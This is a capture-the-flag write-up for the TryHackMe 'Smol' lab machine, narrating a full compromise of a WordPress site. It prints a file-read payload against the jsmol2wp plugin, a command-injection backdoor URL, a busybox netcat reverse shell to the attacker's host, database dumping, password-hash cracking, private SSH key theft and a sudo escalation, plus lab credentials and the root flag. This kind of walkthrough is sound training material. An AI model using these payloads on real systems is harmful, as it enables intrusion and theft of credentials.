Bonjour Hunters! ▄︻デ══━一💥
They say size doesn’t matter — and the Smol machine on TryHackMe proves just that! Don’t let the name fool you; this box packs a punch with tricky exploits, enumeration & privilege escalation techniques.
In this write-up, I’ll walk you through the full hacking process, from enumeration to root access, while sharing insights along the way.
Let’s dive in and pwn Smol like a pro! 🚀
To access the web page, we have to add the IP address to /etc/hosts
echo "<ip> www.smol.thm" >> /etc/hosts
Then we visit the web page of the IP, in which we will be taken to this page below👇:
The first thing that we do here is to look for source code of the web page. But nothing unusual in there.
Then I tried ffuf & nmap for Subdomain fuzzing & port scanning respectively but nothing unusual there too.
💡 Then my brain gave me a kick on what to do next…
As the page uses WordPress, lets just simply try enumerating it with WPScan tool.
🔎If you have no idea about WPScan and want to know about & use it, kindly read this- Learn about WPScan Command Line Usage to understand about WordPress Vulns
Slack the keyboard with the following cmd:
wpscan --url www.smol.thm --enumerate ap,t,u
ap — all plugin enumeration
t — looks for outdated themes for vulns
u — identifies users of that page
After the scanning is done, we should analyze the scanned output it gives.
𖥠 While looking through it, one name among the plugins caught my eye!
I was suspicious about our little guy- jsmol2wp. So I looked through the internet and YES it is vulnerable!
And wow! We have also gathered info about the users!
Save all these info in a file.
As we can see that the plugin is vulnerable, first lets try to crack into it with the help of few research through google.
After few minutes⏱️ of research, I came across this GitHub page:
https://github.com/sullo/advisory-archives/blob/master/wordpress-jsmol2wp-CVE-2018-20463-CVE-2018-20462.txt
in which we can see a clue under the POC side heading.
To clarify, lets try it…
http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php
?isform=true
&call=getRawDataFromDatabase
&query=php://filter/resource=../../../../wp-config.php
Got it!
We got something going on in this page…
When looked through it, we are able to see the Username and Password of a database. Great!
Let’s navigate to the web page: http://www.smol.thm/wp-admin
So that we can login with the creds we got.
✅We are logged in.
Now, its time for us to roam around and see what we find.
When looking around the page- section-by-section, we are able to find Pages in it. Under that section, we are able to see this:
The author here is ‘admin’, and when clicked into ‘Webmaster Tasks!!’ we are seeing this:
It says we should check the code of “Holly Dolly” plugin. I looked for github pages for clues, and I found out that the Holly Dolly will have a source code page in the name of ‘hello.php’
It looks like, any plugin will be having a url that’s similar to:
/wp-content/plugins/jsmol2wp/php/jsmol.php
After several tries that failed, I managed to crack the hidden page.
Hence, let’s modify our url to the following 👇:
http://smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php
?isform=true
&call=getRawDataFromDatabase
&query=php://filter/resource=../../../../wp-content/plugins/hello.py
And yes, we caught the page in our hands!
When scrolling through the page, there’s a hash value that we are able to see:
Let’s open Cyberchef and see what we find.
When pasted the hash value into the input and click the magic wand near the output, we get:
This is an indication there’s a flaw in the web page.
An indication that states to use ‘cmd’ inside “$_GET” , as of
$_GET["cmd"]
Aight!
Try to change the Url of the link to
http://www.smol.thm/wp-admin/edit.php?cmd=whoami
You’ll get the output on the page as this
Well well well gang!
Let’s teach this machine to talk back 😉
Head to revshells.com and look for ‘busybox nc -e’ and click on it.
Start up the listener in your terminal-
nc -lvnp 9001
Now, copy the reverse shell-
busybox nc <ip> 9001 -e sh
and paste it into the link and click enter to get our callback 📞.
https://www.smol.thm/wp-admin/edit.php?cmd=busybox nc <ip> 9001 -e sh
🔑 Shell secured — time to explore the loot!
Stabilizing the shell first:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo;fg
So, what do we have in here…
Looking around as a visitor. Nothing encountered.
But my brain did. I got remembered about the SQL database that we saw in a PHP page. Lets try.
mysql -u wpuser -p
Enter the password we used to login for the user:
kbLSF2Vop#lw3rjDZ629*Z%G
Bam, it worked!
Then to view the databases-
show databases;
we are looking for ‘wordpress’ passwords, lets go for it.
use wordpress;
show tables;
This will display the tables in wordpress database.
Here we are looking for user’s passwords so:
‘wp_users’ suits well.
select * from wp_users;
🔐Well here, we have all the password hashes. Copy and save ALL of ’em hashes into a hash.txt file.
Lets try de-hashing it with the help of The Ripper.
john hash.txt --format=phpass --wordlist=/usr/share/wordlists/rockyou.txt
The phpass format is a Portable PHP Password Hashing Framework used in WordPress.
After a while of waiting my poor core usage at its fullest:
We’ll be getting the de-hashed value:
Now when we look at the users where we found before in the process of using WPScan:
By seeing we are able to guess that the password: sandiegocalifornia belongs to the user: diego
1337! We’re in as diego.
Its essential to note that- the privilege escalation that we’re doing here is in a Horizontal level Privilege Escalation
After cd-ing into diego from /home
WE GOT OUR FIRST FLAG! 🚩
Hotsy-totsy!
Now, we are also able to get into
/home/gege &
/home/think from diego.
cd /home/gege
ls -la
We are able to see the ‘wordpress.old.zip’ file. But when we try to unzip it, we aren’t able to really do it as it is owned by root.
We will see what’s available in /home/think
cd /home/think
ls -la
Good, we’re seeing something off the board here:
cd .ssh
ls -la
cat id_rsa
Great, a private key!!
Now, lets get into the think account completely.
ssh think@www.smol.thm -i id_rsa
By doing this we get into the user of think.
When we now get into
cd /home/gege
ls -la
We can witness that the file is still owned by the root
Aight! Now we shall do
su gege
and start a server for us to download it into our machine and extract the password using zip2john.
python3 -m http.server 8080
and when you navigate to the browser(http://ip:8080), you would see
click on it to download.
Once it is downloaded, head to the path of the downloaded file and get into the terminal from there.
Then clack the below cmd
zip2john wordpress.old.zip > wphash
It would be quick in it and a file of the name wphash would be created. the cat version of the file would look like this:
Now. Let’s run The Ripper
john wphash -w=/usr/share/wordlists/rockyou.txt
DARN IT!
That was quick!
Now getting back to the reverse shell terminal and trying to unzip the file
And
cd wordpress.old
LOOK!
Our Finest DANGEROUS file!
And when we cat it:
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/documentation/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** Database username */
define( 'DB_USER', 'xavi' );
/** Database password */
define( 'DB_PASSWORD', 'P@ssw0rdxavi@' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
We got Xavi user’s Password too!!
su xavi
After getting into the xavi account with the help of the password obtained:
P@ssw0rdxavi@
Lets see the permissions for xavi:
💰Root-access AMAZING!
Type the below command to get into bash shell of xavi to become #ROOT.
sudo sudo /bin/sh
Then when we do the following
▄︻╦芫≡══ — HACKSTATIC!
ROOT FLAG CAPTURED:
bf89ea3ea01992353aef1f576214d4e4
🔍 Wrapping Up: Small Box, Big Lessons
The Smol machine might be tiny in name, but it packs a punch 💥 in teaching fundamental enumeration, privilege escalation, and shell exploitation techniques. This challenge reinforces the golden rule of penetration testing—never underestimate the "small" details 🧐, as they often hold the key 🔑 to unlocking the entire system.
Whether you're a beginner sharpening your recon skills 🛠️ or a seasoned hacker looking for a quick thrill 🎯, Smol proves that size doesn’t always matter—methodology does.
Until next time, keep hacking, keep learning 🧑💻, and remember: even the smallest misconfigurations can lead to the biggest vulnerabilities. ⚠️
Follow me on Medium for more contents related to Cybesecurity!